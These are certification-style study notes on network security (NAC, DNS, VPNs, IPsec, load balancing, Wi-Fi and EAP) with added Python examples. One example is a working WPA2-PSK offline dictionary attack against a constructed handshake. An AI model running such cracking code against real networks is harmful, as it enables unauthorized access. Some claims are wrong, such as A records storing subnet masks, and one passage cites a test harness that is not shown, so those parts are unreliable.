Network Access Control (NAC) : "Agent vs Agentless" -- Define Agent What is an Agent? An Agent is software that is installed on the client's computer and usually performs tasks such as authenticating the user, checking for updates and ensuring the device complies with the organization's security standards. Some operating systems include Network Access Control (NAC) as part of the Operating System itself, and no additional agent is required. These generally perform checks when the system logs into the network and logs out of the network, making them less configurable. If you need additional functionality, you may require two more types of Agents: 1. Persistent: a permanent agent is installed on the host. 2. Dissolvable: a dissolvable agent is known as temporary and is installed for a single use
Network Access Control (NAC) -- define "Agentless" The NAC controller is embedded into Active Directory and so it does not need an Agent to be installed
Network Access Control (NAC) also known as network admission control, is the process of restricting unauthorized users and devices from gaining access to a corporate or private network. NAC ensures that only users who are authenticated and devices that are authorized and compliant with security policies can enter the network ------------------------------- After a remote client has authenticated, Network Access Control (NAC) checks that the device being used is patched and compliant with corporate security policies. A compliant device is allowed access to the LAN. A non-compliant device may be redirected to a boundary network where a remediation service addresses issues - A boundary network is sometimes called a “quarantine network”
DNS Poisoning (review) when an attacker alters the domain-name-to-IP-address mappings in a DNS system to redirect traffic to a rogue system or perform DoS against a system
DNS Spoofing occurs when an attacker sends false replies to a requesting system, beating the real reply from the valid DNS server
DNS Hijacking aka “DNS Redirection” attack. There are many ways to perform DNS Hijacking; the most common way we see is used by a captive portal such as a pay-for-use WiFi hotspot.
Homograph Attack aka Script Spoofing a method of deception wherein a Threat Actor / malicious attacker leverages the similarities of character scripts to create and register phony/fake International Domain Names (IDNs) of existing ones to fool users and lure them into visiting those websites. e.g. the Latin character "a" is replaced with the Cyrillic character "а" in example.com, or "l" is substituted with the number "1".
End Goal of most DNS attacks
What is DNSSEC being used for? Prevents unauthorized access to DNS records on the server. Each DNS record is digitally signed, creating an RRSIG record (a digitally signed record) to protect against attacks
DNS cache stores recently resolved DNS requests for later reuse, reducing calls to the DNS server
DNS cache (review) stores recently resolved DNS requests for later reuse, reducing calls to the DNS server
Hosts File This is a flat-file where name and IP pairs are stored on a client. (Often checked before request is sent to DNS server)
DNS Server This normally maintains only the hostnames for domains it is configured to serve. - Server is said to be “authoritative” for those domains
DNS Root Server DNS nameservers that operate in the root zone. They can also refer requests to the appropriate Top-Level Domain (TLD) server.
DOMAIN NAME SYSTEM (DNS) DOMAIN NAME SYSTEM (DNS) a hierarchical naming system that resolves a hostname to an IP address. PORT: 53
Fully-Qualified Domain Name (FQDN) A hostname + Domain. for example: server1.contoso.com
DNS Record Types (there are MANY, but here are some common ones) here is an overview of resource records (RRs) permissible in zone files of the Domain Name System (DNS). Records: SOA (Start of Authority record); A (Address record for IPv4); AAAA (IPv6 Address record); SRV (Service Locator - a generalized service location record, used instead of protocol-specific records such as MX); CNAME (Canonical Name record); NS (Name Server); PTR (Pointer record); MX (Mail Exchange record); RRSIG (DNSSEC signature); DNAME (Delegation Name record)
SOA record Start of Authority (SOA) record: specifies authoritative information about a DNS zone, including the primary name server, the email of the domain administrator, the domain serial number, and several timers relating to refreshing the zone. - considered an important DNS record type that stores admin information about a domain. This information includes the email address of the admin and when the domain was last updated.
DNS "A" record one of the most important DNS record types. The "A" in A record stands for "Address". An A record shows the IP address for a specific hostname or domain. It uses the IPv4 address. The A record is the Address record for IPv4. It returns a 32-bit IPv4 address, most commonly used to map hostnames to an IP address of the host. Also stores Subnet Masks. The main use of the A record is for IP address lookup. - Another use of the A record is in the domain name system-based blackhole list (DNSBL). Here, the A record is used to block mail from known spam sources.
DNS AAAA record AAAA is the IPV6 Address Record. returns a 128-bit IPv6 address. It maps a domain or subdomain on IPv6 DNS A record is IPv4 - points to the IP address for a domain. However, this DNS record type is different in the sense that it points to IPV6 addresses.
SRV record Service Locator (SRV) Record -- A Generalized Service Location Record, used for newer protocols INSTEAD of creating protocol-specific records, for example MX. - Using this DNS record type, it's possible to store the IP address and port for specific services.
CNAME record CNAME is a Canonical Name record, aka the Alias record. It is an "Alias" of one name to another: the DNS lookup will continue by retrying the lookup with the new name. - remember: it is a DNS record that points a domain name (an alias) to another domain. In a CNAME record, the alias doesn't point to an IP address, and the domain name that the alias points to is the canonical name. Example: the subdomain ng.example.com can point to example.com using a CNAME. Here example.com points to the actual IP address using an A record. - A practical example for the use of CNAME records is running multiple subdomains for different purposes on the same server.
NS record Name Server (NS) record: points to where internet applications like a web browser can find the IP address for a domain name. Usually, multiple nameservers are specified for a domain. For example, these could look like ns1.examplehostingprovider.com and ns2.examplehostingprovider.com.
MX record Mail Exchange (MX) record: an MX record makes it possible to direct emails to a mail server.
PTR record Pointer record (PTR) maps an IP address to a hostname (domain name). The PTR record resolves an IP address to a domain/hostname. PTRs are primarily used for DNS reverse address lookup
DNAME record DELEGATION NAME RECORD (DNAME). Alias for a name and all its subnames, unlike CNAME, which is an alias for only the exact name.
RRSIG record type aka DNSSEC signature. Signature for a DNSSEC-secured record set.
(SPF) - Sender Policy Framework Sender Policy Framework (SPF): this is a text (TXT) record used by DNS to prevent spam and confirm the legitimacy of the domain from which the email originated
(DMARC) - Domain-based Message Authentication, Reporting and Conformance Domain-based Message Authentication, Reporting and Conformance (DMARC): this is a DNS text (TXT) record that is used by Internet Service Providers (ISPs) to prevent malicious email, such as phishing or spear phishing attacks.
(VPN) Virtual Private Network (VPN) mechanism for creating a secure connection between a computing device and a computer network, or between two networks, using an insecure communication medium such as the public Internet. Extends a private network across a public network, enabling users and devices to send and receive data across shared or public networks as if their computing devices were directly connected to the private network.
VPN -- "Always on" some VPN software can be configured to be "Always On".
SSL / TLS VPN VPNs that use the common SSL/TLS protocol (uses TCP Port 443) - (almost) has no Firewall issues. - does not need a big VPN client, not incredibly complex - usually used for remote access communications - Authenticates users (no requirement for Digital Certificates or shared passwords, unlike IPsec) - VPNs can be run from a Web Browser or from a (light) VPN client - Also runs across many Operating Systems
HTML5 VPNs (Hypertext Markup Language version 5) - HTML5 includes comprehensive API support and a Web Cryptography API as part of the web browser. We simply start a browser that supports HTML5 and we are able to send SSL VPN communication
Full Tunnel VPN End user VPN configuration can be configured as a Full Tunnel or a Split Tunnel - in a Full Tunnel - Everything that is being transmitted by the End user goes to a VPN concentrator which decides what it will do with the Data - In a Full Tunnel: All of the Data goes across the Encrypted Tunnel and the END user can NOT break out of that Tunnel to send information to another device directly.
Split Tunnel The Administrator of the VPN can configure some of the information to go through the "Tunnel" and other information can go OUTSIDE of the tunnel. Ex: an end user can communicate with the remote network via the VPN concentrator, but if they need to communicate with another website server, they can communicate through the SPLIT tunnel DIRECTLY to that server. It doesn't need to go through the Full Tunnel.
Site-to-Site VPN In site-to-site VPN, IPSec site-to-site VPN uses an always on mode where both packet header and payload are encrypted. - uses IPSec tunnel mode
Remote Access VPN In a remote access scenario, a connection is initiated from a user's PC or laptop for a connection of shorter duration - uses IPsec Transport Mode.
Split Tunnel vs Full Tunnel Full tunnel means using VPN for all traffic, both to the Internet and corporate network. Split tunnel uses VPN for traffic destined for the corporate network only, and Internet traffic direct through its normal route.
Remote Access vs Site-to-Site VPN In site-to-site, IPsec site-to-site VPN uses an always-on mode where both packet header and payload are encrypted. (IPsec tunnel mode) In a remote access scenario, a connection is initiated from a user's PC or laptop for a connection of shorter duration. -- uses IPsec transport mode
(L2TP) Layer 2 Tunneling Protocol (L2TP) - connects 2 networks / sites together OVER a LAYER 3 Network acts as if they're on the same Layer 2 network. However, they are connected OVER a LAYER 3 Network - L2TP/IPSec - THE MOST SECURE TUNNELING PROTOCOL that can use Kerberos authentication, certificates and pre-shared keys
OSI Model Layers 7. The Application Layer (Layer 7) 6. The Presentation Layer (Layer 6) 5. The Session Layer (Layer 5) 4. Transport Layer (Layer 4) 3. Network Layer (Layer 3) 2. Data Link (Layer 2) 1. Physical (Layer 1)
IPSec Internet Protocol Security (IPsec) is a secure network protocol suite that authenticates and encrypts packets of data to provide secure communication between two computers. It is used in VPNs - Security for OSI Layer 3 (Network Layer). Uses 2 major protocols: 1. Authentication Header (AH) Protocol - authenticates the origin of IP packets (datagrams) and guarantees the integrity of the data. 2. Encapsulating Security Payload (ESP) Protocol - provides ENCRYPTION and authenticates the packets of data between computers using a Virtual Private Network (VPN).
IPSec Modes IPSec has 2 Modes: 1. Tunnel Mode - (Most Commonly used mode for IPSec) 2. Transport Mode In Tunnel Mode: the IP Header, Data, and ESP Trailer are ENCRYPTED. The rest are Authenticated In Transport Mode: the DATA & ESP Trailer are the only Encrypted items.
(VLAN) Virtual Local Area Network (VLAN) A VLAN is any broadcast domain that is partitioned and isolated in a computer network at the Data Link Layer (Layer 2). - usually done in switches; a logical segmentation of a LAN.
Where is Screened Subnet located? previously known as Demilitarized Zone (DMZ) & "Triple-Homed Setup". It is a subnet that is placed between two routers or firewalls. Bastion host(s) are located within that subnet.
What is East-West traffic? where Network Traffic moves Laterally, between Servers WITHIN a Data Center.
North-South Traffic traffic that moves outside of the data center
Network Segmentation Approach that divides a network into multiple segments or subnets, each acting as its own small network. This allows network administrators to control the flow of traffic between subnets based on granular policies.
Reasons for Network Segmentation: Providing Security can also improve security by isolating traffic and user access to those segments where they are authorized. Boosting Performance can improve performance through an organizational scheme in which systems that often communicate are located in the same segment, while systems that rarely or never communicate are located in other segments. Reducing Communication Problems reduces congestion and contains communication problems, such as broadcast storms, to individual subsections of the network.
Extranet An extranet is a private network that enterprises use to provide trusted third parties -- such as suppliers, vendors, partners, customers and other businesses -- secure, controlled access to business information or operations. Extranets, which take the form of external-facing websites or platforms, can sometimes be viewed as part of or an extension of the organization's intranet. This is because the information hosted on an extranet is typically only accessible on internal networks. Although information on an extranet is accessible to users outside the company, access is tightly controlled and only awarded to authorized users.
Intranet a private network that is designed to host the information internal to the organization
Zero Trust - No entity is trusted by default - addresses the limitations of the legacy network perimeter-based security model. - Treats User Identity as the control. - Assumes that there is compromise / breach in verifying EVERY request. - EVERYTHING must be Verified - Nothing is trusted - Multifactor Authentication, Encryption, System permissions is included. A system where there is NO trust and everything has to be verified.
Load Balancing a software or hardware device that distributes network traffic across multiple servers. This ensures no single server bears too much demand.
Load Balancing Algorithms (Scheduling Load Balancing) 1. Round Robin: rotates servers by directing traffic to the 1st available server and then moves that server to the bottom of the queue. Most useful when servers are of equal specification and there are not many persistent connections. 2. Smart Loading: load balancer and servers are constantly communicating amongst themselves to tell the LB which server can take the next workload 3. Least Connection Method — directs traffic to the server with the fewest active connections. Most useful when there are a large number of persistent connections in the traffic unevenly distributed between the servers 4. Least Response Time Method — directs traffic to the server with the fewest active connections and the lowest average response time. 5. Dynamic Round Robin: sends the next request to the server with the lightest/least load. 6. Weighted Round Robin: prioritizes 1 server over another. More traffic goes to the server with the higher specs
Active - Active Load Balancing Act like an array as they deal with the traffic together at full capacity. If one of them fails it will significantly degrade the performance
Active-Passive Load Balancing Active node is taking care of traffic. Passive node is monitoring and listening If active node fails then the passive takes over so it provides redundancy
Round Robin Rotates servers by directing traffic to the 1st available server and then moves that server to the bottom of the queue. Most useful when servers are of equal specification and there are not many persistent connections. Ex: you have 1 Load Balancer and 2 Servers: the first client to connect is sent to the first server, the second client goes to the second server, the third client goes back to the 1st server, the fourth client back to the 2nd server, and so on.
Least Connection Method directs traffic to the server with the fewest active connections. Most useful when there are a large number of persistent connections in the traffic unevenly distributed between the servers
Dynamic Round Robin: The LB is keeping track of the distributed loads across the servers. Sends the next request to the server with the Lightest/least load.
Weighted Round Robin: Prioritizes 1 Server over Another. Perhaps 1 server received Half of the Load, and the other servers take on the rest.
Virtual IP Load balancing Load Balancer that holds a virtual IP (VIP) and is presented to the client as an application. The client connects to the VIP and the NLB determines the specific application instance to which the traffic should be sent. It eliminates the host's dependency on one individual network interface - You can use a virtual IP to achieve load balancing across multiple interfaces
Persistence/Affinity/Sticky Session (Load Balancing) When the NLB is set to Affinity the request that comes is being sent to the previously connected server based on the user's IP and/or session ID
Load Balancing Cluster The hardware Load Balancer that distributes the traffic across multiple servers to improve performance - Load Balancing Clusters prioritize balancing the jobs among all of the servers in the cluster and incorporate load balancing software in the controlling node.
WiFi Protected Access 2 (WPA2) WPA2 is also An encryption scheme that implemented the Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP). - Based on AES Encryption. - CCMP is based on the AES encryption scheme - Allows Pre-Shared Keys. (PSK)
WiFi Protected Access 3 (WPA3) still uses AES encryption with it's Data, but unlike WPA2, it replaced the CCMP with SAE (Simulataneous Authentication of Equals). The reason it replaced CCMP was because the PSK (Pre Shared Keys) became a security issue.
(SAE) Simultaneous Authentication of Equals (SAE) used with WPA3-Personal and replaces the WPA2-PSK (this protects against Brute Force Attacks) - uses a secure Diffie Hellman handshake, called Dragonfly - uses perfect forward secrecy, so immune to offline attacks
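Why WPA2-PSK was a problem and SAE fixes it, as an added Python example (not from the original notes): the 802.11i key derivation is implemented with the standard library, a "captured" four-way handshake is constructed from a chosen passphrase, and a wordlist is run against it offline. SSID, MAC addresses, nonces and the EAPOL frame bytes are made up for the demo; the PBKDF2/PRF/MIC steps are the standard ones.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3
    blocks = [
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes) -> bytes:
    # Both MACs and both nonces travel in the clear in the four-way handshake,
    # so everything here except the PMK is available to a passive sniffer.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (CCMP/AES): HMAC-SHA1 over the EAPOL-Key frame with
    # its MIC field zeroed, truncated to 128 bits. KCK = first 16 bytes of the PTK.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_psk(capture: dict, wordlist):
    """Offline attack: every candidate passphrase is tested against the captured
    MIC with no further interaction with the access point."""
    for guess in wordlist:
        ptk = derive_ptk(derive_pmk(guess, capture["ssid"]), capture["ap_mac"],
                         capture["sta_mac"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol_m2"]), capture["mic"]):
            return guess
    return None


def build_capture(passphrase: str) -> dict:
    """Constructed stand-in for a sniffed handshake (SSID, MACs, nonces and the
    EAPOL frame are made up); the MIC is computed the way a real station would."""
    cap = {
        "ssid": "CorpGuest",
        "ap_mac": bytes.fromhex("00112233aabb"),
        "sta_mac": bytes.fromhex("66778899ccdd"),
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
        # EAPOL-Key message 2 with the 16-byte MIC field zeroed (layout simplified).
        "eapol_m2": bytes.fromhex("0103007502010a00") + bytes(64) + bytes(16) + bytes(26),
    }
    ptk = derive_ptk(derive_pmk(passphrase, cap["ssid"]), cap["ap_mac"],
                     cap["sta_mac"], cap["anonce"], cap["snonce"])
    cap["mic"] = eapol_mic(ptk[:16], cap["eapol_m2"])
    return cap


if __name__ == "__main__":
    capture = build_capture("sunshine2024")   # constructed "capture", see above
    wordlist = ["password", "letmein", "sunshine2024", "qwerty123"]
    print("recovered passphrase:", crack_psk(capture, wordlist))
```

Each guess costs one PBKDF2 run (4096 HMAC-SHA1 iterations), which GPUs do millions of times per second, and nothing in the loop touches the network. With SAE there is no value an attacker can check offline: the Dragonfly commit/confirm exchange lets an attacker test exactly one password per live exchange with the AP, and rate limiting stops that.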
(CCMP) Counter Mode with Cipher Block Chaining Message Authentication Code Protocol: created to replace WEP and TKIP (WPA). - uses AES (Advanced Encryption Standard) with a 128-bit key - used with WPA2, which replaced WEP and WPA - Counter (CTR) mode produces the keystream that is XORed with the plaintext (confidentiality); CBC-MAC over the frame header and payload produces the MIC (integrity). The two together are AES-CCM, an authenticated-encryption mode, so a modified frame fails the MIC check and is dropped. The per-packet nonce includes the packet number, which must never repeat under the same key.
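The CCM construction itself, as an added Python example (not from the original notes): CBC-MAC computes the tag, CTR mode encrypts payload and tag, and decryption refuses frames whose tag does not verify. Because CTR and CBC-MAC only ever run the block cipher forward, a keyed SHA-256 truncation stands in for AES-128 so the code runs without a third-party library; that stand-in is an assumption for the demo and is not a secure cipher. Nonce length and tag length match CCMP (13 bytes and 8 bytes); the block formatting follows RFC 3610 with L=2.

```python
import hashlib
import hmac

BLOCK = 16
NONCE_LEN = 13   # CCMP nonce: priority || sender MAC || 48-bit packet number
TAG_LEN = 8      # CCMP MIC length


def block_fn(key: bytes, x: bytes) -> bytes:
    """Stand-in for one AES-128 block encryption E_k(x). NOT secure, demo only:
    CTR and CBC-MAC call the block cipher forward only, so any keyed 16-byte
    function shows the same data flow."""
    assert len(x) == BLOCK
    return hashlib.sha256(key + x).digest()[:BLOCK]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pad_block(data: bytes) -> bytes:
    return data + bytes(-len(data) % BLOCK)


def chunks(data: bytes):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]


def cbc_mac(key: bytes, nonce: bytes, aad: bytes, plaintext: bytes) -> bytes:
    """CBC-MAC over B0 || AAD || plaintext. B0 binds the nonce and the message
    length, so the tag covers header, length and payload."""
    flags = bytes([(0x40 if aad else 0) | (((TAG_LEN - 2) // 2) << 3) | 1])
    b0 = flags + nonce + len(plaintext).to_bytes(2, "big")
    aad_enc = pad_block(len(aad).to_bytes(2, "big") + aad) if aad else b""
    chain = bytes(BLOCK)
    for blk in [b0, *chunks(aad_enc), *chunks(pad_block(plaintext))]:
        chain = block_fn(key, xor_bytes(chain, blk))
    return chain


def ctr_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    # A_i = flags || nonce || counter. A_0 masks the tag, A_1.. mask the payload.
    return block_fn(key, b"\x01" + nonce + counter.to_bytes(2, "big"))


def ccm_encrypt(key: bytes, nonce: bytes, aad: bytes, plaintext: bytes) -> bytes:
    assert len(nonce) == NONCE_LEN
    tag = cbc_mac(key, nonce, aad, plaintext)[:TAG_LEN]
    n_blocks = (len(plaintext) + BLOCK - 1) // BLOCK
    keystream = b"".join(ctr_block(key, nonce, i) for i in range(1, n_blocks + 1))
    ciphertext = xor_bytes(plaintext, keystream[:len(plaintext)])
    return ciphertext + xor_bytes(tag, ctr_block(key, nonce, 0)[:TAG_LEN])


def ccm_decrypt(key: bytes, nonce: bytes, aad: bytes, message: bytes):
    """Returns the plaintext, or None when the MIC fails (the frame must be dropped)."""
    ciphertext, masked_tag = message[:-TAG_LEN], message[-TAG_LEN:]
    n_blocks = (len(ciphertext) + BLOCK - 1) // BLOCK
    keystream = b"".join(ctr_block(key, nonce, i) for i in range(1, n_blocks + 1))
    plaintext = xor_bytes(ciphertext, keystream[:len(ciphertext)])
    tag = xor_bytes(masked_tag, ctr_block(key, nonce, 0)[:TAG_LEN])
    expected = cbc_mac(key, nonce, aad, plaintext)[:TAG_LEN]
    if not hmac.compare_digest(tag, expected):
        return None
    return plaintext


if __name__ == "__main__":
    key = bytes(range(16))                      # constructed temporal key
    nonce = bytes.fromhex("00" + "0a1b2c3d4e5f" + "000000000001")
    frame = ccm_encrypt(key, nonce, b"802.11 header", b"hello from the station")
    print(ccm_decrypt(key, nonce, b"802.11 header", frame))
```

The last test in the harness shows why the packet number is part of the nonce: two frames encrypted under the same key and nonce XOR together to the XOR of their plaintexts, which is exactly the failure the CCMP replay counter is there to prevent.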
(EAP) Extensible Authentication Protocol: an authentication framework (not a single method) that allows new authentication methods to be used over existing wireless or point-to-point connection technologies. Common methods: EAP-FAST, PEAP, EAP-TLS, EAP-TTLS.
EAP-FAST (Flexible Authentication via Secure Tunneling): wireless authentication protocol created by Cisco, used to perform session authentication. It replaced LEAP, which was not secure. - No digital certificates are required; a Protected Access Credential (PAC), a shared secret, is used instead. ========= How it works: - The client is provisioned with a PAC (shared secret) by the Authentication Server (AS). - The client and AS use the PAC to mutually authenticate and negotiate a Transport Layer Security (TLS) tunnel. - User authentication occurs inside the TLS tunnel. - Requires a RADIUS server to provide the authentication database and EAP-FAST services.
PEAP (Protected Extensible Authentication Protocol): encapsulates inner EAP methods (commonly MS-CHAPv2) within a TLS tunnel, providing authentication and protecting the inner exchange. - The tunnel is built with a server certificate only; it does NOT use a PAC (shared secret) like EAP-FAST. - Created by Cisco, Microsoft and RSA Security. - Clients must validate the server certificate, or a rogue AP can harvest the inner credentials.
EAP-TLS (EAP Transport Layer Security): the most secure of the common wireless authentication methods; requires X.509 certificates on both the server and each client (mutual certificate authentication), so a PKI is needed. Involves 3 parties: the Supplicant (user device) -> the Authenticator (switch or wireless controller) -> the Authentication Server (RADIUS).
EAP-TTLS (EAP Tunneled Transport Layer Security): type of EAP that uses 2 phases: 1 - set up a secure TLS tunnel with the server using a server certificate only (no client certificate, so it is seamless for the client) 2 - authenticate the user inside the tunnel with a legacy protocol such as MS-CHAP or PAP. Designed to connect to legacy authentication systems.
IEEE 802.1X (aka 802.1x Network Access Control): an IEEE standard for port-based network access control (PNAC) on wired switch ports and wireless access points. 802.1X defines authentication controls for any user or device trying to access a LAN or WLAN. - You do not get access to the network until you authenticate; until then the port only passes EAPOL frames. - used in conjunction with an authentication server and directory (e.g., RADIUS, LDAP, TACACS+). - Uses EAP to carry the authentication. Other definition: when certificate-based EAP (EAP-TLS) is used it is transparent to users, and it is used in conjunction with a RADIUS server in enterprise networks.
(RADIUS) Federation (Remote Authentication Dial-in User Service): a protocol and software arrangement that enables members of one organization to authenticate to the network of another organization within the federation using their normal (home) credentials; it links a user's identity across multiple authentication systems. - Federation: established trust across multiple RADIUS servers and across multiple companies / organizations (the visited RADIUS server proxies the request to the user's home RADIUS server). - uses 802.1X as the access method with RADIUS on the back end and EAP to authenticate. Ex: eduroam for universities.
PSK (WPA2-PSK / WPA2-Personal): introduced for the home user who does not have an enterprise setup; the user enters the wireless router's passphrase to gain access to the home network. Everyone shares the same key, and a captured four-way handshake can be attacked offline with a wordlist. - PSK in WPA2 was replaced by SAE in WPA3.
Enterprise: the corporate version of WPA2 or WPA3, used in a centralized domain environment. A RADIUS server is combined with 802.1X, often using certificates (EAP-TLS) for per-user authentication, so there is no shared passphrase to leak.
Open: no authentication and (before WPA3's OWE) no encryption; anyone in range can join and traffic can be captured. Seen in home and guest scenarios, often combined with a captive portal. - Suggested: DO NOT USE THIS, it is a security risk. WPS (Wi-Fi Protected Setup) is a separate enrollment feature for PSK networks: the router already holds the passphrase and hands it to the device when the button is pressed or an 8-digit PIN is entered. The PIN is validated in two halves, so it can be brute-forced in a few thousand attempts; disable WPS.
Captive Portals: usually used at airports, hotels and cafes. Before getting network access on the Wi-Fi, the user is redirected to a web page to accept terms or provide an additional identification factor such as a social-media login, room number or voucher code.
Site Surveys (Installation Considerations): the process of investigating and identifying the presence, strength and reach of wireless access points deployed in an environment. - usually involves walking around with a portable wireless device, noting the wireless signal strength and mapping it on a plot or schematic of the building. Done before deployment to plan AP placement and afterwards to confirm coverage and spot rogue APs.
Heat maps: a Wi-Fi heat map lets you VIEW the coverage of your network and Wi-Fi access points. This helps you see which areas lack coverage and which have strong and dependable signal strength. Several factors can interfere with the signal: physical objects such as walls, or other transmitters (neighbouring routers, microwave ovens, Bluetooth devices) operating on the same channel. Example: www.dnsstuff.com/wi-fi-heat-maps
WiFi analyzers: software applications / tools that report details about your wireless network and the networks around you (SSIDs, channels, signal strength, security type), helping you optimize your Wi-Fi for best performance and spot rogue or misconfigured access points.
Channel overlap: occurs when devices on overlapping channels try to talk over each other, causing adjacent-channel interference. Other definition: when signals from two or more devices (wireless routers or radios) transmitting on overlapping frequencies are received with comparable intensity, interference occurs frequently in that zone. In the 2.4 GHz band the channels are only 5 MHz apart but each transmission is about 20 MHz wide, so only channels 1, 6 and 11 do not overlap. The best solution is to change the channel of the router or device to one that won't overlap.
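A channel-plan check a site survey would run over the channels read from a Wi-Fi analyzer, as an added Python example (not from the original notes). The AP names and channel assignments are constructed; the center-frequency formula and the 20 MHz channel width are the 2.4 GHz band values (pass 22 MHz for legacy 802.11b).

```python
from itertools import combinations

NON_OVERLAPPING = (1, 6, 11)   # the only mutually non-overlapping 2.4 GHz channels


def center_mhz(channel: int) -> int:
    """Center frequency of a 2.4 GHz channel: 2407 + 5*n MHz for 1-13, 2484 for 14."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def interference(a: int, b: int, width_mhz: int = 20):
    """Classify what two APs do to each other: 'co-channel' (they share airtime
    politely through CSMA), 'adjacent-channel' (partial overlap, which corrupts
    frames), or None (no interaction)."""
    if a == b:
        return "co-channel"
    if abs(center_mhz(a) - center_mhz(b)) < width_mhz:
        return "adjacent-channel"
    return None


def survey_findings(aps: dict, width_mhz: int = 20):
    """aps maps AP name -> channel as read from a Wi-Fi analyzer.
    Returns (ap1, ap2, kind) for every pair of APs that interferes."""
    findings = []
    for (x, cx), (y, cy) in combinations(sorted(aps.items()), 2):
        kind = interference(cx, cy, width_mhz)
        if kind:
            findings.append((x, y, kind))
    return findings


def assign_channels(ap_names):
    """Simple plan: cycle through 1/6/11 so neighbouring APs never overlap.
    Real plans also account for which APs can actually hear each other."""
    return {name: NON_OVERLAPPING[i % 3] for i, name in enumerate(ap_names)}


if __name__ == "__main__":
    seen = {"AP-lobby": 1, "AP-hall": 2, "AP-east": 6, "AP-west": 11}  # constructed
    print(survey_findings(seen))
    print(assign_channels(sorted(seen)))
```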
Where should a Wireless Access Point (WAP) be placed? New WAPs should be placed in spots with minimal channel overlap and maximum coverage of the area. Electronic devices, concrete walls and other metal bodies absorb or reflect the signal. Avoid placing APs against exterior walls where the signal leaks outside the building.
Controller and Access Point security: in a large office there will be many WAPs, each with its own configuration; they need to be managed from a centralized wireless controller. HTTPS (and SSH) should be used so the management traffic is encrypted, and default administrator credentials must be changed.
Cellular: cellular networks are used for mobile devices (cell phones). Cell towers separate the network into individual cells, and each antenna uses a different set of frequencies for its cell. Security concerns: - on some cell networks the traffic between the phone and the tower can be monitored (for example by a rogue base station) - location tracking based on the signal your phone sends to the tower - worldwide access to a mobile device: you can connect over any of these networks via LTE, which is a problem for security teams that need you to "authenticate" into their network, because the device is on a network outside their controls.
Wi-Fi: local network access presents local security problems - the same security concerns exist for other Wi-Fi devices and networks - the next concern is encrypting your data so it can't be captured and read (WPA2/WPA3, never open networks) - an on-path (man-in-the-middle) attack is a concern, where someone sits in the middle of the conversation and watches the communication go back and forth - DoS attacks (deauthentication, jamming) are always a concern
Definition of Bluetooth: Bluetooth (IEEE 802.15.1) personal area networks (PANs) provide short-range, moderate-speed communication, typically up to about 10 meters for common class 2 devices. They are another area of wireless security concern. Connects headsets for cell phones, mice, keyboards, GPS receivers and other devices. Connections are set up using pairing, where the primary device scans the 2.4 GHz band for discoverable devices; leave devices non-discoverable when not pairing.
RFID (Radio Frequency Identification): uses radio waves to read an identifier stored in a tag attached to an asset, in order to track it. Commonly used in shops, where tags are attached to high-value goods to prevent theft. - The reader transmits radio energy to the tag; the RF energy powers a passive tag and the tag transmits its ID back. Provides bidirectional communication. Concerns: tags can be read by anyone with a reader in range (skimming) and cloned.
NFC (Near Field Communication): two-way wireless communication that builds on RFID and is designed to work over a few centimetres. Subject to many of the same vulnerabilities as RFID. Seen in: - payment systems (Google Wallet, Apple Pay) - bootstrapping Bluetooth pairing - use as an access token or identity card. Security concerns: - remote capturing / eavesdropping (although the intended range is centimetres, an active NFC device can be eavesdropped from up to roughly 10 meters) - frequency jamming, causing a DoS - susceptible to man-in-the-middle and relay attacks - if you lose your phone or it is stolen, you lose the NFC token / device along with it
Infrared: purely line-of-sight with a maximum range of about 1 meter. Can be used to print from your laptop to an infrared printer. - included on many smartphones, tablets and smartwatches - allows you to control your entertainment center using IR - file transfers are possible - Infrared provides no authentication or encryption, so other phones can be used to control your IR devices
USB (Universal Serial Bus): allows a physical connection from a device to your computer; the device can even be a mobile device. Some mobile devices can be tethered via USB to provide internet access. A flash drive / USB device can be used to transfer data between devices. - It is a data exfiltration (and malware introduction) concern, often blocked through policy: a mobile phone can act as a mobile storage device, and you do not want private information from a computer copied to an employee's cell phone.
(P2P) Point-to-point connection: a permanent, dedicated one-to-one connection between 2 devices communicating on a network, typically via telephone line, wireless or fiber. Traditionally these connections do NOT traverse the public Internet, but there are exceptions such as cloud VoIP. Ex: a point-to-point network link connecting 2 buildings. Point-to-point is sometimes abbreviated as P2P; this usage is distinct from P2P meaning peer-to-peer in the context of file-sharing networks or other data-sharing protocols between peers.
(P2MP, PTMP or PMP) Point-to-multipoint communication: a way for 1 device (the point) to send information to multiple other devices (the multipoint) at once over a shared channel; multiple paths from a single location to multiple locations. One of the most popular communication methods today (802.11 wireless). Typically used in wireless Internet and IP telephony via gigahertz radio frequencies. - Does not imply full connectivity between nodes. - Ex: a WAP serving multiple wireless devices
Global Positioning System (GPS): uses satellites in Earth orbit to determine a receiver's position. - created by the U.S. Department of Defense - precise navigation needs to see at least 4 satellites - determines location from the timing differences of the signals from each satellite: using these differences it computes your longitude, latitude and altitude - commonly used for maps and directions
